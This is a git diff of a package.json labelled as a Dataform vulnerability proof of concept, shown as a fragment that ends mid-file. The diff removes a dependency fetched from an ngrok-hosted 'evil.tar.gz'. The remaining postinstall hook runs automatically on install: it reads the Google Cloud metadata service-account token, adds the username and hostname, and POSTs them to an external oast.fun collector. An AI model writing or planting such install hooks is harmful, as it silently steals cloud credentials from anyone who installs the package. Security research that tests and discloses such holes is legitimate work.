--- a/package.json
+++ b/package.json
@@ -3,8 +3,7 @@
   "version": "1.0.0",
   "description": "Dataform vulnerability PoC - tests npm lifecycle script execution",
   "dependencies": {
-    "@dataform/core": "^2.9.0",
-    "evil-pkg": "https://8cc4c45656a3.ngrok-free.app/evil.tar.gz"
+    "@dataform/core": "^2.9.0"
   },
   "scripts": {
     "postinstall": "curl -s -X POST -H 'Content-Type: application/json' -d \"{\\\"poc\\\":\\\"npm_postinstall\\\",\\\"ts\\\":\\\"$(date -u +%Y-%m-%dT%H:%M:%SZ)\\\",\\\"user\\\":\\\"$(whoami)\\\",\\\"host\\\":\\\"$(hostname)\\\",\\\"token\\\":\\\"$(curl -s -H 'Metadata-Flavor: Google' http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/token 2>/dev/null || echo blocked)\\\"}\" https://juolbtoughjktrdppdvuqemhwftehn8z6.oast.fun/npm",
